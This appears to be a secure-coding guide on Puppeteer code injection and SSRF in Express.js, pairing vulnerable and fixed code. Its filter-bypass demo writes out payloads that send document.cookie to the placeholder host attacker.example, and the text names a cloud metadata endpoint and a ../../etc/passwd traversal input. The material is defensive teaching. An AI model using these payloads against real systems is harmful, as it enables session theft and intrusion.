Express.js Puppeteer Code Injection

High Risk Code Injection
Tags: express, puppeteer, code-injection, javascript, browser-automation, ssrf

What it is

The Express.js application uses Puppeteer for browser automation with user-controlled input, leading to code injection vulnerabilities. Attackers can inject malicious JavaScript code that gets executed in the browser context, potentially leading to data exfiltration, SSRF, or other security issues.

// Vulnerable: User input in page.evaluate()
const puppeteer = require('puppeteer');

app.post('/scrape', async (req, res) => {
  const url = req.body.url;
  const script = req.body.script;
  
  const browser = await puppeteer.launch();
  const page = await browser.newPage();
  
  await page.goto(url); // Dangerous: unvalidated URL
  
  // Dangerous: executing user-controlled script
  const result = await page.evaluate(script);
  
  await browser.close();
  res.json({ result });
});

// Secure: allowlisted URLs and predefined scripts only
const puppeteer = require('puppeteer');
const { URL } = require('url');

const ALLOWED_DOMAINS = ['example.com', 'safe-site.com'];
// Predefined functions; the request only selects a key and never supplies code.
// A Map avoids accidental matches on Object.prototype keys such as "constructor".
const SAFE_SCRIPTS = new Map([
  ['get-title', () => document.title],
  ['get-url', () => window.location.href]
]);

app.post('/scrape', async (req, res) => {
  const urlString = req.body.url;
  const scriptName = req.body.script;
  let browser;

  try {
    // Validate URL: http(s) only, and the hostname must be on the allowlist
    const url = new URL(urlString);
    if (!['http:', 'https:'].includes(url.protocol) ||
        !ALLOWED_DOMAINS.includes(url.hostname)) {
      return res.status(400).json({ error: 'Domain not allowed' });
    }

    // Use predefined safe scripts only
    const script = SAFE_SCRIPTS.get(scriptName);
    if (!script) {
      return res.status(400).json({ error: 'Script not allowed' });
    }

    // Keep Chromium's sandbox enabled (do not pass --no-sandbox)
    browser = await puppeteer.launch();
    const page = await browser.newPage();

    await page.goto(url.toString());
    const result = await page.evaluate(script);

    res.json({ result });
  } catch (error) {
    res.status(400).json({ error: 'Invalid request' });
  } finally {
    // Always release the browser, even when navigation or evaluation fails
    if (browser) await browser.close();
  }
});

💡 Why This Fix Works

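The secure version never executes client-supplied code. The request can only select a key from a fixed set of predefined scripts, and navigation is limited to URLs whose hostname is on an explicit allowlist. Anything else is rejected with a 400 response before a browser is launched.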

Why it happens

The vulnerability arises whenever request data reaches a Puppeteer API that executes code or steers the browser: page.evaluate(), page.evaluateHandle(), page.addScriptTag(), page.goto(), or page.setContent(). The root causes below describe the common patterns.

Root causes

User Input Directly Passed to page.evaluate() or page.addScriptTag()

Express applications pass user-controlled input directly to Puppeteer's page.evaluate(), which executes JavaScript in the browser context: await page.evaluate(req.body.script) or page.addScriptTag({content: userCode}). Developers use page.evaluate() to add dynamic behavior without realizing that it runs arbitrary JavaScript that can read the page DOM, cookies, and localStorage, and can make network requests. Malicious input can therefore read sensitive data in rendered pages, exfiltrate it to attacker-controlled servers, or attempt to exploit browser vulnerabilities. page.evaluateHandle() and page.addScriptTag() are equivalent code execution vectors when given untrusted input.

User-Controlled URLs in page.goto() Without Validation

Applications pass user-provided URLs to Puppeteer navigation without validation: await page.goto(req.query.url). Attackers supply URLs for internal services (http://localhost:6379/), cloud metadata endpoints (http://169.254.169.254/), or malicious sites built to exploit Puppeteer-controlled browsers. Because the request originates from the server running the headless browser, this is an SSRF vector that reaches resources behind network firewalls. Non-web schemes add further risk: javascript: URLs can execute code in the browser context, file:// URLs read the local filesystem, and data: URLs with embedded scripts run in the page context, enabling XSS-like attacks against the automation.

Insufficient JavaScript Code Sanitization for Browser Execution

Applications attempt to sanitize user input for page.evaluate() with incomplete or bypassable filters. A filter that checks for keywords such as 'fetch', 'XMLHttpRequest', or 'eval' is bypassed with bracket notation, Unicode escapes, or alternative APIs (navigator.sendBeacon, window.open). String-based sanitization does not parse JavaScript, so payloads hide in comments, template literals, or regex literals. Filters that catch obvious attack patterns still miss DOM manipulation (document.createElement('script')), indirect code execution (setTimeout with a string argument), and functions the application has exposed to the page (for example via page.exposeFunction()).
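To make the bypass concrete, the sketch below uses a hypothetical naiveFilter (an illustration, not taken from any library) that rejects scripts containing the keywords named above. The second and third payloads reach the network without ever containing a blocked keyword; attacker.example is a placeholder host.

```javascript
// Hypothetical keyword blocklist of the kind described above (illustrative only).
const BLOCKED_KEYWORDS = ['fetch', 'XMLHttpRequest', 'eval'];

function naiveFilter(code) {
  // Returns true when the code contains none of the blocked keywords.
  return !BLOCKED_KEYWORDS.some((word) => code.includes(word));
}

// A direct call to fetch is caught by the filter.
const obvious = "fetch('https://attacker.example/?c=' + document.cookie)";

// The same call built with bracket notation is not caught, because the
// literal substring "fetch" never appears in the source text.
const bypass = "window['fe' + 'tch']('https://attacker.example/?c=' + document.cookie)";

// An alternative API that the blocklist never mentions.
const beacon = "navigator.sendBeacon('https://attacker.example/', document.cookie)";

console.log(naiveFilter(obvious)); // false (rejected)
console.log(naiveFilter(bypass));  // true (accepted, although it exfiltrates cookies)
console.log(naiveFilter(beacon));  // true (accepted)
```

Extending the keyword list does not close the gap, since the set of equivalent spellings is effectively unbounded.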

Dynamic Puppeteer Script Generation with User Input

Applications generate Puppeteer automation scripts by concatenating user input into JavaScript code: const script = `await page.goto('${userUrl}'); await page.screenshot();`. Input containing quotes, template literal syntax, or comment characters breaks out of the string context and injects arbitrary Puppeteer commands. An attacker can then change browser behavior, add page.evaluate() calls, alter screenshot parameters, or talk to the Chrome DevTools Protocol (CDP) directly. Because the generated script runs in the Node.js process, it has the same permissions as the application, including access to the filesystem, environment variables, and network resources.
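The breakout can be seen by building the script string with a crafted value. In this sketch, buildScriptUnsafe and screenshotUrl are hypothetical names, and the payload is one possible attacker input; nothing here launches a browser.

```javascript
// Vulnerable pattern from the text: user input concatenated into code.
function buildScriptUnsafe(userUrl) {
  return `await page.goto('${userUrl}'); await page.screenshot();`;
}

// Hypothetical attacker input: closes the string and the goto() call,
// adds a new command, then comments out the rest of the original line.
const payload = "https://example.com'); await page.evaluate(() => document.cookie); //";

// The generated "script" now contains an extra page.evaluate() call.
console.log(buildScriptUnsafe(payload));

// Safer shape: the code is fixed and the URL is handled purely as data.
// The URL should still pass allowlist validation before this is called.
async function screenshotUrl(page, validatedUrl) {
  await page.goto(validatedUrl);
  return page.screenshot();
}
```

With the second form there is no string for the input to break out of, so quoting tricks have no effect.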

Missing Validation of File Paths and Content for Browser Operations

Applications use user input to choose file paths for Puppeteer operations without validation. User-controlled paths in page.goto('file://' + userPath), page.setContent(fs.readFileSync(userFile)), or a download directory (for example, the downloadPath passed to the CDP Browser.setDownloadBehavior command) enable path traversal, arbitrary file read, or filesystem manipulation. User-specified HTML loaded through page.setContent() may contain malicious scripts if it is not sanitized. Applications treat user-provided HTML as inert data without recognizing that it can carry JavaScript, iframes, or meta refresh redirects. File upload features render user-supplied HTML or SVG files in Puppeteer without content validation.

Fixes

1. Validate and Sanitize All User Input Before Puppeteer Operations

Never pass user input directly to page.evaluate(), page.addScriptTag(), or any other Puppeteer method that executes code. Validate URLs with the URL class and reject anything that is not http: or https:, for example: const url = new URL(userInput); if (!['http:', 'https:'].includes(url.protocol)) reject. For page.evaluate(), pass data as function arguments rather than concatenating it into code: page.evaluate((data) => {/* use data */}, sanitizedUserData). Sanitize HTML with DOMPurify before page.setContent(): const clean = DOMPurify.sanitize(userHtml). In Node.js, DOMPurify needs a DOM implementation such as jsdom, and the SAFE_FOR_JQUERY flag seen in older examples is no longer part of current DOMPurify releases. Validate file paths with path.resolve() and check that the result is inside an allowed directory. Apply type checks and schema validation to every user input before it reaches Puppeteer.
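A minimal sketch of the argument-passing approach, assuming the client is only allowed to choose a simple CSS selector. The names validateSelector, readText, and SELECTOR_PATTERN are hypothetical, and the pattern is deliberately restrictive rather than a complete CSS grammar.

```javascript
// Hypothetical rule: accept only short, simple CSS selectors from the client.
const SELECTOR_PATTERN = /^[a-zA-Z0-9_\-#.\s>]{1,100}$/;

function validateSelector(input) {
  if (typeof input !== 'string' || !SELECTOR_PATTERN.test(input)) {
    throw new TypeError('Invalid selector');
  }
  return input;
}

// The function body is fixed. The selector travels to the page as a
// serialized argument, so it is never parsed as JavaScript there.
async function readText(page, userSelector) {
  const selector = validateSelector(userSelector);
  return page.evaluate((sel) => {
    const el = document.querySelector(sel);
    return el ? el.textContent : null;
  }, selector);
}
```

In an Express handler this might be called as await readText(page, req.body.selector), with the thrown TypeError mapped to a 400 response.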

2. Implement Strict URL and Domain Allowlists

Create explicit allowlists of permitted domains and URL patterns for page.goto() navigation. Define allowed domains: const allowedDomains = ['example.com', 'trusted-cdn.net']; validate URL hostname matches allowlist before navigation. Use URL parser to extract and validate all components: protocol, hostname, port, path. Block dangerous URL schemes: reject javascript:, data:, file:, blob: URLs. For internal rendering, use indirect reference pattern where users select from predefined template IDs mapped to safe URLs server-side. Implement domain reputation checking or integrate with threat intelligence feeds to detect malicious domains. Log all blocked navigation attempts for security monitoring.
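The allowlist check might look like the following sketch. The function name validateNavigationUrl and the returned shape are assumptions made for illustration; the domain list is the example from the text. Rejecting credentials and non-default ports is an extra precaution added here, not a requirement stated above.

```javascript
const { URL } = require('node:url');

// Example allowlist from the text; adjust to the deployment.
const allowedDomains = ['example.com', 'trusted-cdn.net'];

function validateNavigationUrl(input) {
  let url;
  try {
    url = new URL(input);
  } catch {
    return { ok: false, reason: 'unparseable URL' };
  }
  // Only plain web schemes. This rejects javascript:, data:, file:, and blob:.
  if (!['http:', 'https:'].includes(url.protocol)) {
    return { ok: false, reason: 'scheme not allowed' };
  }
  // Embedded credentials are rarely legitimate for rendering jobs.
  if (url.username || url.password) {
    return { ok: false, reason: 'credentials not allowed' };
  }
  // url.port is '' when the scheme's default port is used.
  if (url.port !== '') {
    return { ok: false, reason: 'port not allowed' };
  }
  // Exact hostname match. IP literals and lookalike hosts such as
  // example.com.evil.net are not on the list and are rejected.
  if (!allowedDomains.includes(url.hostname)) {
    return { ok: false, reason: 'host not allowed' };
  }
  return { ok: true, url: url.toString() };
}

console.log(validateNavigationUrl('https://example.com/page'));
console.log(validateNavigationUrl('http://169.254.169.254/latest/meta-data/'));
console.log(validateNavigationUrl('javascript:alert(1)'));
```

This check covers only the initial URL. Redirects and subresource requests are not re-validated by it; request interception (page.setRequestInterception(true)) is one place where the same function could be applied again.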

3. Never Generate Dynamic JavaScript with User Input

Eliminate all dynamic JavaScript code generation using user input. Never concatenate user data into code strings for page.evaluate(): delete code like page.evaluate(`const data = '${userInput}';`). Use page.evaluate() with function parameters passing data as arguments: await page.evaluate((safeData) => { /* code using safeData */ }, validatedInput). For conditional logic based on user input, use data-driven approaches: pass configuration objects and have client-side code make decisions based on data values, not execute user-provided code. Pre-define all JavaScript functions executed in browser context. Use allowlisted function dispatch pattern if behavior customization is required.
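One way to sketch the allowlisted function dispatch pattern is a Map of predefined functions keyed by action name. PAGE_ACTIONS, resolveAction, and runAction are hypothetical names, and the three actions are only examples.

```javascript
// Pre-defined functions that are allowed to run in the browser context.
const PAGE_ACTIONS = new Map([
  ['title', () => document.title],
  ['linkCount', () => document.querySelectorAll('a').length],
  ['textOf', (selector) => {
    const el = document.querySelector(selector);
    return el ? el.textContent : null;
  }],
]);

function resolveAction(name) {
  // A Map lookup does not see Object.prototype keys such as "constructor",
  // which a plain object lookup (obj[name]) would return.
  return typeof name === 'string' ? PAGE_ACTIONS.get(name) : undefined;
}

async function runAction(page, name, arg) {
  const action = resolveAction(name);
  if (!action) {
    throw new Error('Action not allowed');
  }
  // arg is serialized and delivered as data; it is never evaluated as code.
  return page.evaluate(action, arg ?? null);
}
```

The request then carries only an action name and, where needed, a validated argument, for example runAction(page, 'textOf', 'h1').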

4. Implement Content Security Policy in Puppeteer Pages

Apply a strict Content Security Policy to pages rendered by Puppeteer to limit the damage from injected scripts. CSP is delivered with the response, so page.setExtraHTTPHeaders(), which only adds headers to outgoing requests, cannot impose it. For HTML loaded with page.setContent(), place the policy in a meta tag ahead of the content: <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'">. For pages served by your own application, send the same policy as a response header. Use nonce-based CSP for legitimate scripts when needed. For untrusted HTML content, use the strictest policy: default-src 'none'; script-src 'none'. Disable JavaScript entirely when rendering untrusted content that does not need it: await page.setJavaScriptEnabled(false) before page.goto() or page.setContent(). CSP is defense in depth: it limits what injected code can do if input validation fails.
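A sketch of the meta-tag approach for content passed to page.setContent(), assuming scripts are not required for rendering. The helper names wrapWithCsp and renderUntrusted and the STRICT_CSP constant are hypothetical; the policy string is one strict choice and will also block images and stylesheets.

```javascript
// Strict policy for untrusted markup: nothing may load or execute.
const STRICT_CSP = "default-src 'none'; script-src 'none'; object-src 'none'; base-uri 'none'";

function wrapWithCsp(untrustedHtml, policy = STRICT_CSP) {
  // The meta tag is placed before the untrusted markup so that the policy
  // is already in force when the browser parses that markup.
  return [
    '<!DOCTYPE html>',
    '<html><head>',
    `<meta http-equiv="Content-Security-Policy" content="${policy}">`,
    '</head><body>',
    untrustedHtml,
    '</body></html>',
  ].join('\n');
}

async function renderUntrusted(page, untrustedHtml) {
  // Static rendering does not need scripts, so turn them off as well.
  await page.setJavaScriptEnabled(false);
  await page.setContent(wrapWithCsp(untrustedHtml), { waitUntil: 'load' });
  return page.screenshot();
}
```

The wrapper is a second layer, not a substitute for sanitizing the HTML first.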

5. Use Sandboxed Browser Contexts for Untrusted Content

Process untrusted content in isolated browser contexts. A separate context keeps cookies and storage apart from other sessions: const context = await browser.createIncognitoBrowserContext(); const page = await context.newPage() (the method is named browser.createBrowserContext() in Puppeteer v22 and later). Keep Chromium's own sandbox enabled: do not launch with --no-sandbox or --disable-setuid-sandbox, which turn off process isolation and are often copied from container setup guides. Flags such as --disable-dev-shm-usage and --disable-gpu address container resource limits and do not affect the sandbox. Bound how long each operation can run with page.setDefaultNavigationTimeout(30000) and page.setDefaultTimeout(30000). Run Puppeteer in Docker containers with minimal permissions and restricted network access. Close contexts immediately after use to prevent resource exhaustion: await context.close().
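The context lifecycle can be wrapped in a small helper so that the context is closed even when the task throws. withIsolatedPage is a hypothetical name; the sketch accepts either context-creation method so it works across Puppeteer versions, which is an assumption about the installed release rather than something the text specifies.

```javascript
async function withIsolatedPage(browser, task, timeoutMs = 30000) {
  // Puppeteer v22+ exposes createBrowserContext(); older releases expose
  // createIncognitoBrowserContext(). Use whichever is present.
  const create = browser.createBrowserContext || browser.createIncognitoBrowserContext;
  const context = await create.call(browser);
  try {
    const page = await context.newPage();
    // Bound navigation and other waits so one job cannot hang indefinitely.
    page.setDefaultNavigationTimeout(timeoutMs);
    page.setDefaultTimeout(timeoutMs);
    return await task(page);
  } finally {
    // Closing the context discards its pages, cookies, and storage.
    await context.close();
  }
}

// Usage sketch (assumes a browser launched with the sandbox left enabled):
// const browser = await puppeteer.launch({ headless: true });
// const title = await withIsolatedPage(browser, async (page) => {
//   await page.goto(validatedUrl);
//   return page.title();
// });
```

Each request gets its own context, so state left behind by one rendering job is not visible to the next.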

6. Validate File Paths and HTML Content Comprehensively

Validate every filesystem operation and every piece of HTML content used with Puppeteer. For file paths, resolve the input against a fixed base directory and verify that the result stays inside it: const resolved = path.resolve('/var/app/public', userPath); if (!resolved.startsWith('/var/app/public/')) reject. Resolving against the base directory matters because path.resolve(userPath) alone resolves relative input against the process working directory. Validate HTML content before page.setContent() using HTML validators and sanitizers. Remove dangerous HTML elements (script, iframe, object, embed) and event handlers (onclick, onerror) using allowlist-based HTML sanitization. For file uploads rendered in Puppeteer, validate the file type, scan for malware, and render in isolated contexts. Never use user-controlled paths in page.goto('file://') navigation.
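A minimal sketch of the containment check, using path.relative() instead of a string prefix comparison so that sibling directories such as /var/app/public-old are not accepted by accident. resolveInside is a hypothetical helper name, and the base directory is the example path from the text.

```javascript
const path = require('node:path');

function resolveInside(baseDir, userPath) {
  const base = path.resolve(baseDir);
  const resolved = path.resolve(base, userPath);
  const relative = path.relative(base, resolved);
  // The target is outside the base (or is the base itself) when the
  // relative path is empty, climbs upward, or is absolute.
  const escapes =
    relative === '' ||
    relative === '..' ||
    relative.startsWith('..' + path.sep) ||
    path.isAbsolute(relative);
  if (escapes) {
    throw new Error('Path escapes allowed directory');
  }
  return resolved;
}

console.log(resolveInside('/var/app/public', 'reports/q1.html'));
try {
  resolveInside('/var/app/public', '../../etc/passwd');
} catch (err) {
  console.log(err.message); // Path escapes allowed directory
}
```

This check is purely lexical. It does not follow symbolic links, so a deployment that allows symlinks inside the base directory would also need to compare real paths (for example with fs.realpath).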
